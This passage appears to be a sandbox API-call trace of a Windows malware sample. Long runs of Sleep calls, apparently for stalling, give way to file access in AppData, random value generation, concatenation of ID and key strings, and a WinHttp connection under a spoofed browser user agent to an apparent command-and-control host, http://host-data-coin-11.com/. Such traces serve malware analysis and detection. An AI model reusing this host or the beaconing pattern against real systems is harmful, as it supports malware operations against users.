(dwMilliseconds=0x258) [0260.812] Sleep (dwMilliseconds=0x258) [0260.829] Sleep (dwMilliseconds=0x258) [0260.843] Sleep (dwMilliseconds=0x258) [0260.859] Sleep (dwMilliseconds=0x258) [0260.932] Sleep (dwMilliseconds=0x258) [0260.969] Sleep (dwMilliseconds=0x258) [0260.997] Sleep (dwMilliseconds=0x258) [0260.999] Sleep (dwMilliseconds=0x258) [0261.015] Sleep (dwMilliseconds=0x258) [0261.032] Sleep (dwMilliseconds=0x258) [0261.046] Sleep (dwMilliseconds=0x258) [0261.062] Sleep (dwMilliseconds=0x258) [0261.124] Sleep (dwMilliseconds=0x258) [0261.146] Sleep (dwMilliseconds=0x258) [0261.156] Sleep (dwMilliseconds=0x258) [0261.171] Sleep (dwMilliseconds=0x258) [0261.187] Sleep (dwMilliseconds=0x258) [0261.202] Sleep (dwMilliseconds=0x258) [0261.219] Sleep (dwMilliseconds=0x258) [0261.235] Sleep (dwMilliseconds=0x258) [0261.296] Sleep (dwMilliseconds=0x258) [0261.311] Sleep (dwMilliseconds=0x258) [0261.327] Sleep (dwMilliseconds=0x258) [0261.343] Sleep (dwMilliseconds=0x258) [0261.359] Sleep (dwMilliseconds=0x258) [0261.374] Sleep (dwMilliseconds=0x258) [0261.389] Sleep (dwMilliseconds=0x258) [0261.452] Sleep (dwMilliseconds=0x258) [0261.473] Sleep (dwMilliseconds=0x258) [0261.483] Sleep (dwMilliseconds=0x258) [0261.499] Sleep (dwMilliseconds=0x258) [0261.514] Sleep (dwMilliseconds=0x258) [0261.530] Sleep (dwMilliseconds=0x258) [0261.545] Sleep (dwMilliseconds=0x258) [0261.623] Sleep (dwMilliseconds=0x258) [0261.646] Sleep (dwMilliseconds=0x258) [0261.655] Sleep (dwMilliseconds=0x258) [0261.670] Sleep (dwMilliseconds=0x258) [0261.686] Sleep (dwMilliseconds=0x258) [0261.701] Sleep (dwMilliseconds=0x258) [0261.717] Sleep (dwMilliseconds=0x258) [0261.733] Sleep (dwMilliseconds=0x258) [0261.795] Sleep (dwMilliseconds=0x258) [0261.811] Sleep (dwMilliseconds=0x258) [0261.826] Sleep (dwMilliseconds=0x258) [0261.842] Sleep (dwMilliseconds=0x258) [0261.857] Sleep (dwMilliseconds=0x258) [0261.873] Sleep (dwMilliseconds=0x258) [0261.897] Sleep (dwMilliseconds=0x258) [0261.905] Sleep (dwMilliseconds=0x258) [0261.967] Sleep (dwMilliseconds=0x258) [0261.995] Sleep (dwMilliseconds=0x258) [0261.998] Sleep (dwMilliseconds=0x258) [0262.014] Sleep (dwMilliseconds=0x258) [0262.029] Sleep (dwMilliseconds=0x258) [0262.045] Sleep (dwMilliseconds=0x258) [0262.060] Sleep (dwMilliseconds=0x258) [0262.076] Sleep (dwMilliseconds=0x258) [0262.139] Sleep (dwMilliseconds=0x258) [0262.154] Sleep (dwMilliseconds=0x258) [0262.169] Sleep (dwMilliseconds=0x258) [0262.185] Sleep (dwMilliseconds=0x258) [0262.201] Sleep (dwMilliseconds=0x258) [0262.216] Sleep (dwMilliseconds=0x258) [0262.232] Sleep (dwMilliseconds=0x258) [0262.295] Sleep (dwMilliseconds=0x258) [0262.316] Sleep (dwMilliseconds=0x258) [0262.325] Sleep (dwMilliseconds=0x258) [0262.341] Sleep (dwMilliseconds=0x258) [0262.358] Sleep (dwMilliseconds=0x258) [0262.372] Sleep (dwMilliseconds=0x258) [0262.388] Sleep (dwMilliseconds=0x258) [0262.403] Sleep (dwMilliseconds=0x258) [0262.467] Sleep (dwMilliseconds=0x258) [0262.481] Sleep (dwMilliseconds=0x258) [0262.497] Sleep (dwMilliseconds=0x258) [0262.513] Sleep (dwMilliseconds=0x258) [0262.528] Sleep (dwMilliseconds=0x258) [0262.544] Sleep (dwMilliseconds=0x258) [0262.559] Sleep (dwMilliseconds=0x258) [0262.653] Sleep (dwMilliseconds=0x258) [0262.669] Sleep (dwMilliseconds=0x258) [0262.684] Sleep (dwMilliseconds=0x258) [0262.700] Sleep (dwMilliseconds=0x258) [0262.716] Sleep (dwMilliseconds=0x258) [0262.731] Sleep (dwMilliseconds=0x258) [0262.748] Sleep (dwMilliseconds=0x258) [0262.809] Sleep (dwMilliseconds=0x258) [0262.826] Sleep (dwMilliseconds=0x258) [0262.840] Sleep (dwMilliseconds=0x258) [0262.856] Sleep (dwMilliseconds=0x258) [0262.871] Sleep (dwMilliseconds=0x258) [0262.887] Sleep (dwMilliseconds=0x258) [0262.903] Sleep (dwMilliseconds=0x258) [0262.965] Sleep (dwMilliseconds=0x258) [0262.989] Sleep (dwMilliseconds=0x258) [0263.012] Sleep (dwMilliseconds=0x258) [0263.027] Sleep (dwMilliseconds=0x258) [0263.044] Sleep (dwMilliseconds=0x258) [0263.058] Sleep (dwMilliseconds=0x258) [0263.074] Sleep (dwMilliseconds=0x258) [0263.122] Sleep (dwMilliseconds=0x258) [0263.143] Sleep (dwMilliseconds=0x258) [0263.153] Sleep (dwMilliseconds=0x258) [0263.168] Sleep (dwMilliseconds=0x258) [0263.183] Sleep (dwMilliseconds=0x258) [0263.203] Sleep (dwMilliseconds=0x258) [0263.214] Sleep (dwMilliseconds=0x258) [0263.231] Sleep (dwMilliseconds=0x258) [0263.293] Sleep (dwMilliseconds=0x258) [0263.308] Sleep (dwMilliseconds=0x258) [0263.324] Sleep (dwMilliseconds=0x258) [0263.340] Sleep (dwMilliseconds=0x258) [0263.355] Sleep (dwMilliseconds=0x258) [0263.371] Sleep (dwMilliseconds=0x258) [0263.393] Sleep (dwMilliseconds=0x258) [0263.435] Sleep (dwMilliseconds=0x258) [0263.456] Sleep (dwMilliseconds=0x258) [0263.465] Sleep (dwMilliseconds=0x258) [0263.480] Sleep (dwMilliseconds=0x258) [0263.497] Sleep (dwMilliseconds=0x258) [0263.511] Sleep (dwMilliseconds=0x258) [0263.527] Sleep (dwMilliseconds=0x258) [0263.542] Sleep (dwMilliseconds=0x258) [0263.620] Sleep (dwMilliseconds=0x258) [0263.636] Sleep (dwMilliseconds=0x258) [0263.651] Sleep (dwMilliseconds=0x258) [0263.668] Sleep (dwMilliseconds=0x258) [0263.683] Sleep (dwMilliseconds=0x258) [0263.698] Sleep (dwMilliseconds=0x258) [0263.714] Sleep (dwMilliseconds=0x258) [0263.777] Sleep (dwMilliseconds=0x258) [0263.792] Sleep (dwMilliseconds=0x258) [0263.807] Sleep (dwMilliseconds=0x258) [0263.823] Sleep (dwMilliseconds=0x258) [0263.839] Sleep (dwMilliseconds=0x258) [0263.854] Sleep (dwMilliseconds=0x258) [0263.870] Sleep (dwMilliseconds=0x258) [0263.932] Sleep (dwMilliseconds=0x258) [0263.948] Sleep (dwMilliseconds=0x258) [0263.963] Sleep (dwMilliseconds=0x258) [0263.996] Sleep (dwMilliseconds=0x258) [0264.010] Sleep (dwMilliseconds=0x258) [0264.026] Sleep (dwMilliseconds=0x258) [0264.088] Sleep (dwMilliseconds=0x258) [0264.105] Sleep (dwMilliseconds=0x258) [0264.119] Sleep (dwMilliseconds=0x258) [0264.135] Sleep (dwMilliseconds=0x258) [0264.150] Sleep (dwMilliseconds=0x258) [0264.166] Sleep (dwMilliseconds=0x258) [0264.182] Sleep (dwMilliseconds=0x258) [0264.244] Sleep (dwMilliseconds=0x258) [0264.260] Sleep (dwMilliseconds=0x258) [0264.275] Sleep (dwMilliseconds=0x258) [0264.302] Sleep (dwMilliseconds=0x258) [0264.307] Sleep (dwMilliseconds=0x258) [0264.323] Sleep (dwMilliseconds=0x258) [0264.340] Sleep (dwMilliseconds=0x258) [0264.400] Sleep (dwMilliseconds=0x258) [0264.417] Sleep (dwMilliseconds=0x258) [0264.432] Sleep (dwMilliseconds=0x258) [0264.447] Sleep (dwMilliseconds=0x258) [0264.463] Sleep (dwMilliseconds=0x258) [0264.478] Sleep (dwMilliseconds=0x258) [0264.494] Sleep (dwMilliseconds=0x258) [0264.510] Sleep (dwMilliseconds=0x258) [0264.596] Sleep (dwMilliseconds=0x258) [0264.615] Sleep (dwMilliseconds=0x258) [0264.619] Sleep (dwMilliseconds=0x258) [0264.635] Sleep (dwMilliseconds=0x258) [0264.650] Sleep (dwMilliseconds=0x258) [0264.666] Sleep (dwMilliseconds=0x258) [0264.681] Sleep (dwMilliseconds=0x258) [0264.710] Sleep (dwMilliseconds=0x258) [0264.760] Sleep (dwMilliseconds=0x258) [0264.780] Sleep (dwMilliseconds=0x258) [0264.790] Sleep (dwMilliseconds=0x258) [0264.807] Sleep (dwMilliseconds=0x258) [0264.822] Sleep (dwMilliseconds=0x258) [0264.837] Sleep (dwMilliseconds=0x258) [0264.853] Sleep (dwMilliseconds=0x258) [0264.869] Sleep (dwMilliseconds=0x258) [0264.915] Sleep (dwMilliseconds=0x258) [0264.939] Sleep (dwMilliseconds=0x258) [0264.946] Sleep (dwMilliseconds=0x258) [0264.962] Sleep (dwMilliseconds=0x258) [0264.979] Sleep (dwMilliseconds=0x258) [0265.002] Sleep (dwMilliseconds=0x258) [0265.009] Sleep (dwMilliseconds=0x258) [0265.024] Sleep (dwMilliseconds=0x258) [0265.097] Sleep (dwMilliseconds=0x258) [0265.118] Sleep (dwMilliseconds=0x258) [0265.134] Sleep (dwMilliseconds=0x258) [0265.149] Sleep (dwMilliseconds=0x258) [0265.165] Sleep (dwMilliseconds=0x258) [0265.180] Sleep (dwMilliseconds=0x258) [0265.197] Sleep (dwMilliseconds=0x258) [0265.212] Sleep (dwMilliseconds=0x258) [0265.274] Sleep (dwMilliseconds=0x258) [0265.294] Sleep (dwMilliseconds=0x258) [0265.306] Sleep (dwMilliseconds=0x258) [0265.321] Sleep (dwMilliseconds=0x258) [0265.336] Sleep (dwMilliseconds=0x258) [0265.352] Sleep (dwMilliseconds=0x258) [0265.368] Sleep (dwMilliseconds=0x258) [0265.383] Sleep (dwMilliseconds=0x258) [0265.445] Sleep (dwMilliseconds=0x258) [0265.466] Sleep (dwMilliseconds=0x258) [0265.477] Sleep (dwMilliseconds=0x258) [0265.494] Sleep (dwMilliseconds=0x258) [0265.509] Sleep (dwMilliseconds=0x258) [0265.525] Sleep (dwMilliseconds=0x258) [0265.543] Sleep (dwMilliseconds=0x258) [0265.555] Sleep (dwMilliseconds=0x258) [0265.634] Sleep (dwMilliseconds=0x258) [0265.663] Sleep (dwMilliseconds=0x258) [0265.664] Sleep (dwMilliseconds=0x258) [0265.679] Sleep (dwMilliseconds=0x258) [0265.695] Sleep (dwMilliseconds=0x258) [0265.711] Sleep (dwMilliseconds=0x258) [0265.727] Sleep (dwMilliseconds=0x258) [0265.743] Sleep (dwMilliseconds=0x258) [0265.804] Sleep (dwMilliseconds=0x258) [0265.823] Sleep (dwMilliseconds=0x258) [0265.835] Sleep (dwMilliseconds=0x258) [0265.853] Sleep (dwMilliseconds=0x258) [0265.867] Sleep (dwMilliseconds=0x258) [0265.882] Sleep (dwMilliseconds=0x258) [0265.898] Sleep (dwMilliseconds=0x258) [0265.913] Sleep (dwMilliseconds=0x258) [0265.993] Sleep (dwMilliseconds=0x258) [0266.017] Sleep (dwMilliseconds=0x258) [0266.023] Sleep (dwMilliseconds=0x258) [0266.038] Sleep (dwMilliseconds=0x258) [0266.054] Sleep (dwMilliseconds=0x258) [0266.069] Sleep (dwMilliseconds=0x258) [0266.086] Sleep (dwMilliseconds=0x258) [0266.101] Sleep (dwMilliseconds=0x258) [0266.164] Sleep (dwMilliseconds=0x258) [0266.183] Sleep (dwMilliseconds=0x258) [0266.196] Sleep (dwMilliseconds=0x258) [0266.210] Sleep (dwMilliseconds=0x258) [0266.226] Sleep (dwMilliseconds=0x258) [0266.241] Sleep (dwMilliseconds=0x258) [0266.257] Sleep (dwMilliseconds=0x258) [0266.272] Sleep (dwMilliseconds=0x258) [0266.335] Sleep (dwMilliseconds=0x258) [0266.357] Sleep (dwMilliseconds=0x258) [0266.366] Sleep (dwMilliseconds=0x258) [0266.381] Sleep (dwMilliseconds=0x258) [0266.410] Sleep (dwMilliseconds=0x258) [0266.413] Sleep (dwMilliseconds=0x258) [0266.428] Sleep (dwMilliseconds=0x258) [0266.445] Sleep (dwMilliseconds=0x258) [0266.506] Sleep (dwMilliseconds=0x258) [0266.528] Sleep (dwMilliseconds=0x258) [0266.538] Sleep (dwMilliseconds=0x258) [0266.553] Sleep (dwMilliseconds=0x258) [0266.569] Sleep (dwMilliseconds=0x258) [0266.620] Sleep (dwMilliseconds=0x258) [0266.678] Sleep (dwMilliseconds=0x258) [0266.699] Sleep (dwMilliseconds=0x258) [0266.709] Sleep (dwMilliseconds=0x258) [0266.725] Sleep (dwMilliseconds=0x258) [0266.741] Sleep (dwMilliseconds=0x258) [0266.756] Sleep (dwMilliseconds=0x258) [0266.771] Sleep (dwMilliseconds=0x258) [0266.787] Sleep (dwMilliseconds=0x258) [0266.850] Sleep (dwMilliseconds=0x258) [0266.870] Sleep (dwMilliseconds=0x258) [0266.881] Sleep (dwMilliseconds=0x258) [0266.908] Sleep (dwMilliseconds=0x258) [0266.912] Sleep (dwMilliseconds=0x258) [0266.928] Sleep (dwMilliseconds=0x258) [0266.943] Sleep (dwMilliseconds=0x258) [0266.960] Sleep (dwMilliseconds=0x258) [0267.021] Sleep (dwMilliseconds=0x258) [0267.046] Sleep (dwMilliseconds=0x258) [0267.052] Sleep (dwMilliseconds=0x258) [0267.084] Sleep (dwMilliseconds=0x258) [0267.099] Sleep (dwMilliseconds=0x258) [0267.125] Sleep (dwMilliseconds=0x258) [0267.131] Sleep (dwMilliseconds=0x258) [0267.194] Sleep (dwMilliseconds=0x258) [0267.213] Sleep (dwMilliseconds=0x258) [0267.225] Sleep (dwMilliseconds=0x258) [0267.240] Sleep (dwMilliseconds=0x258) [0267.255] Sleep (dwMilliseconds=0x258) [0267.271] Sleep (dwMilliseconds=0x258) [0267.296] Sleep (dwMilliseconds=0x258) [0267.302] Sleep (dwMilliseconds=0x258) [0267.364] Sleep (dwMilliseconds=0x258) [0267.390] Sleep (dwMilliseconds=0x258) [0267.396] Sleep (dwMilliseconds=0x258) [0267.411] Sleep (dwMilliseconds=0x258) [0267.427] Sleep (dwMilliseconds=0x258) [0267.442] Sleep (dwMilliseconds=0x258) [0267.458] Sleep (dwMilliseconds=0x258) [0267.474] Sleep (dwMilliseconds=0x258) [0267.537] Sleep (dwMilliseconds=0x258) [0267.557] Sleep (dwMilliseconds=0x258) [0267.567] Sleep (dwMilliseconds=0x258) [0267.609] Sleep (dwMilliseconds=0x258) [0267.615] Sleep (dwMilliseconds=0x258) [0267.630] Sleep (dwMilliseconds=0x258) [0267.646] Sleep (dwMilliseconds=0x258) [0267.708] Sleep (dwMilliseconds=0x258) [0267.743] Sleep (dwMilliseconds=0x258) [0267.755] Sleep (dwMilliseconds=0x258) [0267.770] Sleep (dwMilliseconds=0x258) [0267.785] Sleep (dwMilliseconds=0x258) [0267.801] Sleep (dwMilliseconds=0x258) [0267.819] Sleep (dwMilliseconds=0x258) [0267.832] Sleep (dwMilliseconds=0x258) [0267.895] Sleep (dwMilliseconds=0x258) [0267.920] Sleep (dwMilliseconds=0x258) [0267.926] Sleep (dwMilliseconds=0x258) [0267.941] Sleep (dwMilliseconds=0x258) [0267.958] Sleep (dwMilliseconds=0x258) [0267.976] Sleep (dwMilliseconds=0x258) [0267.988] Sleep (dwMilliseconds=0x258) [0268.009] Sleep (dwMilliseconds=0x258) [0268.067] Sleep (dwMilliseconds=0x258) [0268.084] Sleep (dwMilliseconds=0x258) [0268.102] Sleep (dwMilliseconds=0x258) [0268.113] Sleep (dwMilliseconds=0x258) [0268.129] Sleep (dwMilliseconds=0x258) [0268.144] Sleep (dwMilliseconds=0x258) [0268.160] Sleep (dwMilliseconds=0x258) [0268.176] Sleep (dwMilliseconds=0x258) [0268.238] Sleep (dwMilliseconds=0x258) [0268.253] Sleep (dwMilliseconds=0x258) [0268.269] Sleep (dwMilliseconds=0x258) [0268.286] Sleep (dwMilliseconds=0x258) [0268.300] Sleep (dwMilliseconds=0x258) [0268.316] Sleep (dwMilliseconds=0x258) [0268.332] Sleep (dwMilliseconds=0x258) [0268.394] Sleep (dwMilliseconds=0x258) [0268.409] Sleep (dwMilliseconds=0x258) [0268.425] Sleep (dwMilliseconds=0x258) [0268.441] Sleep (dwMilliseconds=0x258) [0268.456] Sleep (dwMilliseconds=0x258) [0268.472] Sleep (dwMilliseconds=0x258) [0268.487] Sleep (dwMilliseconds=0x258) [0268.550] Sleep (dwMilliseconds=0x258) [0268.567] Sleep (dwMilliseconds=0x258) [0268.602] Sleep (dwMilliseconds=0x258) [0268.614] Sleep (dwMilliseconds=0x258) [0268.628] Sleep (dwMilliseconds=0x258) [0268.643] Sleep (dwMilliseconds=0x258) [0268.706] Sleep (dwMilliseconds=0x258) [0268.736] Sleep (dwMilliseconds=0x258) [0268.737] Sleep (dwMilliseconds=0x258) [0268.753] Sleep (dwMilliseconds=0x258) [0268.768] Sleep (dwMilliseconds=0x258) [0268.784] Sleep (dwMilliseconds=0x258) [0268.800] Sleep (dwMilliseconds=0x258) [0268.815] Sleep (dwMilliseconds=0x258) [0268.878] Sleep (dwMilliseconds=0x258) [0268.903] Sleep (dwMilliseconds=0x258) [0268.909] Sleep (dwMilliseconds=0x258) [0268.925] Sleep (dwMilliseconds=0x258) [0268.941] Sleep (dwMilliseconds=0x258) [0268.972] Sleep (dwMilliseconds=0x258) [0268.990] Sleep (dwMilliseconds=0x258) [0269.050] Sleep (dwMilliseconds=0x258) [0269.065] Sleep (dwMilliseconds=0x258) [0269.084] Sleep (dwMilliseconds=0x258) [0269.108] Sleep (dwMilliseconds=0x258) [0269.112] Sleep (dwMilliseconds=0x258) [0269.127] Sleep (dwMilliseconds=0x258) [0269.143] Sleep (dwMilliseconds=0x258) [0269.205] Sleep (dwMilliseconds=0x258) [0269.221] Sleep (dwMilliseconds=0x258) [0269.236] Sleep (dwMilliseconds=0x258) [0269.252] Sleep (dwMilliseconds=0x258) [0269.268] Sleep (dwMilliseconds=0x258) [0269.283] Sleep (dwMilliseconds=0x258) [0269.299] Sleep (dwMilliseconds=0x258) [0269.361] Sleep (dwMilliseconds=0x258) [0269.377] Sleep (dwMilliseconds=0x258) [0269.393] Sleep (dwMilliseconds=0x258) [0269.408] Sleep (dwMilliseconds=0x258) [0269.424] Sleep (dwMilliseconds=0x258) [0269.440] Sleep (dwMilliseconds=0x258) [0269.454] Sleep (dwMilliseconds=0x258) [0269.518] Sleep (dwMilliseconds=0x258) [0269.533] Sleep (dwMilliseconds=0x258) [0269.548] Sleep (dwMilliseconds=0x258) [0269.564] Sleep (dwMilliseconds=0x258) [0269.617] Sleep (dwMilliseconds=0x258) [0269.673] Sleep (dwMilliseconds=0x258) [0269.689] Sleep (dwMilliseconds=0x258) [0269.704] Sleep (dwMilliseconds=0x258) [0269.721] Sleep (dwMilliseconds=0x258) [0269.736] Sleep (dwMilliseconds=0x258) [0269.751] Sleep (dwMilliseconds=0x258) [0269.767] Sleep (dwMilliseconds=0x258) [0269.830] Sleep (dwMilliseconds=0x258) [0269.845] Sleep (dwMilliseconds=0x258) [0269.860] Sleep (dwMilliseconds=0x258) [0269.876] Sleep (dwMilliseconds=0x258) [0269.892] Sleep (dwMilliseconds=0x258) [0269.907] Sleep (dwMilliseconds=0x258) [0269.923] Sleep (dwMilliseconds=0x258) [0269.986] Sleep (dwMilliseconds=0x258) [0270.004] Sleep (dwMilliseconds=0x258) [0270.016] Sleep (dwMilliseconds=0x258) [0270.032] Sleep (dwMilliseconds=0x258) [0270.048] Sleep (dwMilliseconds=0x258) [0270.063] Sleep (dwMilliseconds=0x258) [0270.079] Sleep (dwMilliseconds=0x258) [0270.111] Sleep (dwMilliseconds=0x258) [0270.158] Sleep (dwMilliseconds=0x258) [0270.183] Sleep (dwMilliseconds=0x258) [0270.188] Sleep (dwMilliseconds=0x258) [0270.203] Sleep (dwMilliseconds=0x258) [0270.219] Sleep (dwMilliseconds=0x258) [0270.235] Sleep (dwMilliseconds=0x258) [0270.250] Sleep (dwMilliseconds=0x258) [0270.266] Sleep (dwMilliseconds=0x258) [0270.328] Sleep (dwMilliseconds=0x258) [0270.344] Sleep (dwMilliseconds=0x258) [0270.359] Sleep (dwMilliseconds=0x258) [0270.376] Sleep (dwMilliseconds=0x258) [0270.391] Sleep (dwMilliseconds=0x258) [0270.406] Sleep (dwMilliseconds=0x258) [0270.422] Sleep (dwMilliseconds=0x258) [0270.485] Sleep (dwMilliseconds=0x258) [0270.500] Sleep (dwMilliseconds=0x258) [0270.515] Sleep (dwMilliseconds=0x258) [0270.532] Sleep (dwMilliseconds=0x258) [0270.547] Sleep (dwMilliseconds=0x258) [0270.562] Sleep (dwMilliseconds=0x258) [0270.606] Sleep (dwMilliseconds=0x258) [0270.640] Sleep (dwMilliseconds=0x258) [0270.673] Sleep (dwMilliseconds=0x258) [0270.687] Sleep (dwMilliseconds=0x258) [0270.703] Sleep (dwMilliseconds=0x258) [0270.719] Sleep (dwMilliseconds=0x258) [0270.734] Sleep (dwMilliseconds=0x258) [0270.750] Sleep (dwMilliseconds=0x258) [0270.765] Sleep (dwMilliseconds=0x258) [0270.830] Sleep (dwMilliseconds=0x258) [0270.864] Sleep (dwMilliseconds=0x258) [0270.875] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x26) returned 0x97d2300 [0270.875] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c94fe95 [0270.877] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x39) returned 0x9a800a0 [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35ea3bf1 [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3be98a18 [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4115006c [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x688f2a0b [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78b41167 [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f89611b [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6888eded [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3fad9362 [0270.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10936649 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45c8e05b [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39d33018 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3587c8ca [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7266cee3 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a97e56f [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f049e75 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b0c9296 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4772d8ab [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23ce9ef0 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b78d2de [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1bc4248e [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51acdb85 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c85f822 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4625e698 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5804763b [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e9681a0 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fadbaa2 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a2f4144 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c7c0a7 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4cfd75f [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4070fdc8 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43e60b89 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7102ca8d [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69bdec03 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x191db134 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1acee964 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4617332 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c06540a [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a1ddc69 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x589a6414 [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x265f450b [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x551ca52f [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2366ae2c [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbb34dca [0270.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x82e671a [0270.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b11277a [0270.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c73e188 [0270.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b7e2ed8 [0270.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x325db886 [0270.879] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x88) returned 0x9a800f0 [0270.879] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0270.879] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0270.879] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0270.879] lstrcatA (in: lpString1="", lpString2="2C/0lf*18zI5p::qnW!YD[9zgK!DJMv8VygwMt#`:IaQKYYw" | out: lpString1="2C/0lf*18zI5p::qnW!YD[9zgK!DJMv8VygwMt#`:IaQKYYw") returned="2C/0lf*18zI5p::qnW!YD[9zgK!DJMv8VygwMt#`:IaQKYYw" [0270.879] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x9a80180 [0270.879] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0270.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d2300, cbMultiByte=30, lpWideCharStr=0x9a80180, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0270.879] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df4f8 | out: pProxyConfig=0x75df4f8) returned 1 [0270.906] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0270.907] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df5b0 | out: lpUrlComponents=0x75df5b0) returned 1 [0270.907] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3faa0e0 [0270.908] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a802a0 [0270.908] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x68) returned 0x9a802c0 [0270.908] 